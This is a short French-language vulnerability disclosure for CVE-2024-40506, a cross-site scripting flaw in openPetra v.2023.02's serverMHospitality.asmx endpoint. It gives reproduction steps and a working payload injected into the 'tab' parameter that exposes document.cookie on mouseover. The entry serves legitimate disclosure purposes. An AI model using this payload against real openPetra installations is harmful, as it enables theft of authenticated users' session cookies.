
OpenPetra v.2023.02 CVE-2024-40506
Description: Un utilisateur non authentifié peut voler des cookies d'un utilisateur authentifié en exploitant une XSS dans openPetra v.2023.02 via la fonction serverMHospitality.asmx.
Version du produit vulnérable: openPetra v.2023.02
Auteur du CVE: Jansen Moreira
Date: 13/07/2024
CVE: CVE-2024-40506
Lien CVE: https://www.cve.org/CVERecord?id=CVE-2024-40506
Lien NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-40506
Lien Tenable: https://www.tenable.com/cve/CVE-2024-40506
Confirmé le: 13/07/2024
Testé sur: Linux
1- Accéder à la page d'accueil
2- Utiliser le chemin suivant et ajouter la charge utile XSS dans le paramètre tab. EX. :
http://target.com/api/serverMHospitality.asmx?bnd=TMHospitalityWebServiceSoap&op=THospitalityWebConnector_Dummy&page=op&tab=x" onmouseover=alert(document.cookie) x="
3- Passer la souris sur l'élément d'index gauche pour déclencher la XSS
Charges utiles :
tab: x" onmouseover=alert(document.cookie) x="
Découvreur(s)/Crédits : Jansen Moreira